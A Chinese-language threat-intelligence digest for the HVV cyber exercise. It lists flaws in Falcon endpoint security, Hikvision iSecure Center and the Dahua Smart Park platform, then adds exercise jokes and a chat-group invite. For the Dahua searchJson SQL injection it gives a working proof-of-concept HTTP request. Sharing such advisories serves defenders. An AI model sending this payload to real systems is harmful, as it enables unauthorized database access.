HVV第二天摸鱼漏洞情报指南

漏洞情报

猎鹰安全科技终端安全系统 SQL 注入漏洞（ XVE-2023-5913）

影响版本：version ≤ 9.0 2022.10.18.12

临时缓解措施：

使用网络 ACL 限制访问来源， 加强监测。

POC未公开

海康威视 iSecure Center 综合安防管理平台文件上传漏洞

漏洞信息：

https://x.threatbook.com/v5/vul/1f69af7477471f917b0a909d5164f8c9827953ebd6d17bb5acfd507a704f2a619e446f9c551580ed5cf43f5a27d11aaa

大华智慧园区综合管理平台 searchJson SQL注入漏洞

POC已公开

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close

HVV趣闻

安恒蜜罐逃逸？你的蜜罐正发起攻击。

钓鱼？不存在的，他只是想看超短裙。

风险转移，背锅侠你好。

反差，反差？！

钓鱼？他只是想请你吃饭，顺便借你的工作机。

WPS晚上十一点自动修复，大家不用害怕了。

紧急排查！

交流群

交流群获取各种情报

①群已满，扫码添加机器人助手，回复"HW2"进入交流②群！